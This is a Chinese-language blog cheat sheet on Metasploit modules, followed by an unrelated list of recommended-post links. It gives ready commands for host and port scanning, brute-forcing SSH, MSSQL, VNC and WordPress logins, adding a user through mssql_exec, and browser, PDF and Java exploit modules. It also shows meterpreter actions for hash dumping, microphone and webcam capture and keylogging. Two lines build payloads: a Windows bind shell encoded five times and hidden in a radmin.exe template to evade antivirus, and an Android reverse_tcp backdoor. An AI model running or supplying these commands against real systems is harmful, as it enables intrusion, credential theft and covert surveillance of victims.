msf介绍及其常用模块
技术功能模块
exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法
payload:成功exploit之后,真正在目标系统执行的代码或指令
auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块
encoders:对payload进行加密,躲避av检查的模块
nops:提高payload稳定性及维持大小
generate常用选项解释:
-b 去掉坏字符,例如:-b ‘\x00\xff’
-e 设置编码方式,可以使用show encoders命令查看所有编码方式
-f 输出格式,不设置默认为ruby语言。例如-f c或-f exe
-i 设置编码次数,一般用作多次编码免杀
-k 保持源模版行为,并将payload作为一个线程注入到一个进程中,常和-x配合使用
-o 输出文件名
-x 定义一个文件作为模版
use payload/windows/shell_bind_tcp
generate -b ‘\x00\xff’ -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o 1.exe
meterpreter命令
background:返回 pwd lpwd ls cat execute:执行程序 getuid hashdump ps record_mic:记录麦克风 webcam_list:读取摄像头
主机扫描模块:auxiliary/scanner/discovery/arp_sweep
端口扫描模块:auxiliary/scanner/portscan/syn
密码嗅探 : use auxiliary/sniffer/psnuffle -支持从pcap抓包文件中提取密码,目前只支持pop3,imap,ftp,http get协议.
SNMP扫描
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers (windows)
use auxiliary/scanner/snmp/snmp_enumshares (windows)aSASD//AS
SMB版本扫描
use auxiliary/scanner/smb/smb_version
扫描命名管道,判断SMB服务类型(账号密码)
use auxiliary/scanner/smb/pipe_auditor
扫描通过SMB管道可以访问的RCERPC服务
use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB共享枚举(帐号,密码)
use auxiliary/scanner/smb/smb_enumshares
SMB用户枚举(帐号,密码)
use auxiliary/scanner/smb/smb_enumusers
SID枚举(帐号,密码)
use auxiliary/scanner/smb/smb_lookupsid
SSH版本扫描
use auxiliary/scanner/ssh/ssh_version
SSH密码爆破
use auxiliary/scanner/ssh/ssh_login
SSH公钥登录
use auxiliary/scanner/ssh/ssh_login_pubkey
windows缺少的补丁
use post/windows/gather/enum_patches
mssql扫描端口
tcp1433(动态端口)、udp1434(查询tcp端口号)
use auxiliary/scanner/mssql/mssql_ping
爆破mssql密码
use auxiliary/scanner/mssql/mssql_login
远程执行代码
use auxiliary/scanner/mssql/mssql_exec
set CMD net user user pass /ADD
ftp版本扫描
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_login
弱点扫描
vnc密码破解
use auxiliary/scanner/vnc/vnc_login
vnc 无密码访问
use auxiliary/scanner/vnc/vnc_none_auth
RDP远程桌面漏洞
use auxiliary/scanner/rdp/ms12_020_check
检查不会造成dos攻击
设备后门
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor
VMware ESXI 密码爆破
use auxiliary/scanner/vmware/vmauthd_login
use auxiliary/scanner/vmware/vmware_enum_vms
利用WEB API
use auxiliary/admin/vmware/poweron_vm
http弱点扫描
过期证书:use auxiliary/scanner/http/cert
显示目录及文件:use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/files_dir
webdav unicode编码身份绕过:use auxiliary/scanner/http/dir_webdav_unicode_bypass
tomcat管理登录:use auxiliary/scanner/http/tomcat_mgr_login
基于http方法的身份验证绕过:use auxiliary/scanner/http/verb_auth_bypass
wordpress密码爆破:use auxiliary/scanner/http/wordpress_login_enum
set URI/wordpress/wp-login.php
利用Acrobat Reader漏洞执行payload
构造PDF文件:exploit/windows/fileformat/adobe_utilprintf
构造恶意网站:exploit/windows/browser/adobe_utilprintf
Meterpreter
use priv
run post/windows/capture/keylog_recorder
利用flash插件漏洞执行payload
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2
利用IE浏览器漏洞执行payload
use exploit/windows/browser/ms14_064_ole_code_execution (windowsxp)
利用JRE漏洞执行payload
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
生成android后门程序
use payload/android/meterpreter/reverse_tcp
generate -f a.apk -p android -t raw
msf介绍及其常用模块相关推荐
- 实战篇一 python常用模块和库介绍
# -_-@ coding: utf-8 -_-@ -- Python 常用模块和库介绍 第一部分:json模块介绍 import json 将一个Python数据结构转换为JSON: dict_ = ...
- python用什么来写模块-Python常用模块——模块介绍与导入
Python常用模块--模块介绍与导入 一.什么是模块? 在计算机程序的开发过程中,随着程序代码越写越多,在一个文件里代码就会越来越长,越来越不容易维护. 为了编写可维护的代码,我们把很多函数分组,分 ...
- Ansible 自动化运维工具之inventory和常用模块介绍
一.inventory介绍 前面我们介绍过ansible的hosts文件是存放被管理主机的,被管理主机比较少的情况下,直接在hosts中定义即可,但是以后很定会管理多台主机,而ansible可管理的主 ...
- Ansible中的常用模块介绍
文章目录 一.ansible实现管理的方式 二.Ad-Hoc执行方式中如何获得帮助 三.ansible命令运行方式及常用参数 四.ansible的基本颜色代表信息 五.ansible中的常用模块 让设 ...
- PyQt5常用模块介绍
# pip install PyQt5-------------------PyQt5安装包 # pip install PyQt5-sip---------------sip版本不对可能会引起异常, ...
- MSF(二):msf外部/内部常用命令
msf外内部常用命令 安全牛学习Metasploit Framework笔记 1.msf外部命令 msfconsole -h/-q/-r/-v/exit msf的帮助信息/安静启动,没有banner/ ...
- Ansible5:Ad-hoc常用模块
目录 ping模块 file模块 copy模块 yum模块 service模块 cron模块 user模块与group模块 user模块 group示例 synchronize模块 filesyste ...
- python常用模块大全总结-常用python模块
广告关闭 2017年12月,云+社区对外发布,从最开始的技术博客到现在拥有多个社区产品.未来,我们一起乘风破浪,创造无限可能. python常用模块什么是模块? 常见的场景:一个模块就是一个包含了py ...
- Python 之路 Day5 - 常用模块学习
模块介绍 time &datetime模块 random os sys shutil json & picle shelve xml处理 yaml处理 configparser has ...
- Python入门:常用模块—logging模块
logging日志可以分为:debug(),info(),warning(),error(),critical() 5个级别 最简单用法 import logginglogging.warning(& ...
最新文章
- Tarjan求割点桥
- C语言\b回退一格!多点的!_只愿与一人十指紧扣_新浪博客
- Android 下 APK 捆绑器的实现
- Java中读取本地图片并转为base64解决办法
- 微信小程序与AspNetCore SignalR聊天实例
- Codeforces Round #695(Div. 2)
- 05-Flutter移动电商实战-dio基础_引入和简单的Get请求
- linuc和python常用命令是一样的么_linuc和python常用命令是一样的么_python教程3--《linux常用命令》...
- mro列表_MRO模块操作指导书
- 目标检测相关概念:IOU,precision, recall, AP, mAP
- 适应adblock plus 规则的简单正则表达式匹配
- 微信小程序 js 正则校验车牌号 车牌号校验
- bug解决 2021-09-25 Unity人物动画无法正常播放的问题
- java 度分秒转换为度_andriod Java中度转度分秒
- JavaScript 日期和时间基础知识
- python的安装框架acode_Python安装与入门
- 用the_excerpt处理中文文章字数限制的方法
- 贪心背后的故事Codeforces 995B(Suit and Tie)
- spreadsheet php,PhpSpreadsheet的简单使用
- IDEA配置注释模板
热门文章
- 系统管理员已经限制你可以使用的登录类型(网络或交互式)
- 揭秘!飞机上不为人知的六大“怪事”
- 特征码、特征码的概念、特征码的作用、常见的特征码
- IAR for ARM介绍、下载、安装与注册
- IAR For ARM 7.8下载地址
- vue页面引用百度地图怎么让百度logo不显示
- 夜深人静写算法(二)- 动态规划
- error: ‘__ATOMIC_RELAXED’ undeclared (first use in this function)
- 大话西游,唐僧与悟空合伙创业,股权几何?
- linux mysql 挂马_解决数据库被挂马最快方法